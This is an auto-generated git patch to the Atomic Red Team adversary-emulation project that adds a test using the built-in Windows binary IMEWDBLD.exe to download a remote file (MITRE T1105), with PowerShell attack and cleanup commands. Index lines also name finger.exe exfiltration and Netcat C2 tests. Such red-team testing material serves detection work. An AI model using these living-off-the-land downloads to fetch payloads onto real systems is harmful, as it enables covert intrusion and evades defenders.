From ba0b1a3c355bd9a6722a6fa2ba093121d5eabfce Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 9 Sep 2021 18:02:46 +0000 Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 26 +++++++++++ atomics/T1105/T1105.md | 45 +++++++++++++++++++ 6 files changed, 75 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 1b382326..6ff36ad2 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -920,6 +920,7 @@ command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell command-and-control,T1105,Ingress Tool Transfer,16,File download with finger.exe on Windows,5f507e45-8411-4f99-84e7-e38530c45d01,command_prompt +command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD.exe,1a02df58-09af-4064-a765-0babe1a0d1e2,powershell command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 7ac2c803..e453dcab 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -550,6 +550,7 @@ command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a U command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell command-and-control,T1105,Ingress Tool Transfer,16,File download with finger.exe on Windows,5f507e45-8411-4f99-84e7-e38530c45d01,command_prompt +command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD.exe,1a02df58-09af-4064-a765-0babe1a0d1e2,powershell command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index fb91be3d..011d4200 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1619,6 +1619,7 @@ - Atomic Test #14: whois file download [linux, macos] - Atomic Test #15: File Download via PowerShell [windows] - Atomic Test #16: File download with finger.exe on Windows [windows] + - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #1: Connection Proxy [macos, linux] - Atomic Test #2: Connection Proxy for macOS UI [macos] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 78b21bdb..d585c6dd 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -982,6 +982,7 @@ - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] - Atomic Test #15: File Download via PowerShell [windows] - Atomic Test #16: File download with finger.exe on Windows [windows] + - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #3: portproxy reg key [windows] - T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index b7e62028..42ed6fd1 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -67202,6 +67202,32 @@ command-and-control: command: 'finger base64_filedata@#{remote_host} ' + - name: Download a file with IMEWDBLD.exe + auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2 + description: | + Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file. + Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]." or `%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1].. + Run "Get-ChildItem -Path C:\Users\\AppData\Local\Microsoft\Windows\INetCache\ -Include * -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file. + supported_platforms: + - windows + input_arguments: + remote_url: + description: Location of file to be downloaded. + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml + file_name: + description: Name of the file to be downloaded without extension. + type: string + default: T1105 + executor: + command: | + $imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe" + & $imewdbled #{remote_url} + cleanup_command: "$inetcache = $env:LOCALAPPDATA + \"\\Microsoft\\Windows\\INetCache\\\" + \n$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include + #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)\ncmd.exe + /c \"del $file_to_be_removed\"\n" + name: powershell T1090.001: technique: external_references: diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index f07bebc5..bcb6dc73 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -36,6 +36,8 @@ - [Atomic Test #16 - File download with finger.exe on Windows](#atomic-test-16---file-download-with-fingerexe-on-windows) +- [Atomic Test #17 - Download a file with IMEWDBLD.exe](#atomic-test-17---download-a-file-with-imewdbldexe) +
@@ -663,4 +665,47 @@ finger base64_filedata@#{remote_host} +
+
+ +## Atomic Test #17 - Download a file with IMEWDBLD.exe +Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file. +Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]." or `%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1].. +Run "Get-ChildItem -Path C:\Users\\AppData\Local\Microsoft\Windows\INetCache\ -Include * -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 1a02df58-09af-4064-a765-0babe1a0d1e2 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| remote_url | Location of file to be downloaded. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml| +| file_name | Name of the file to be downloaded without extension. | string | T1105| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe" +& $imewdbled #{remote_url} +``` + +#### Cleanup Commands: +```powershell +$inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\" +$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue) +cmd.exe /c "del $file_to_be_removed" +``` + + + + +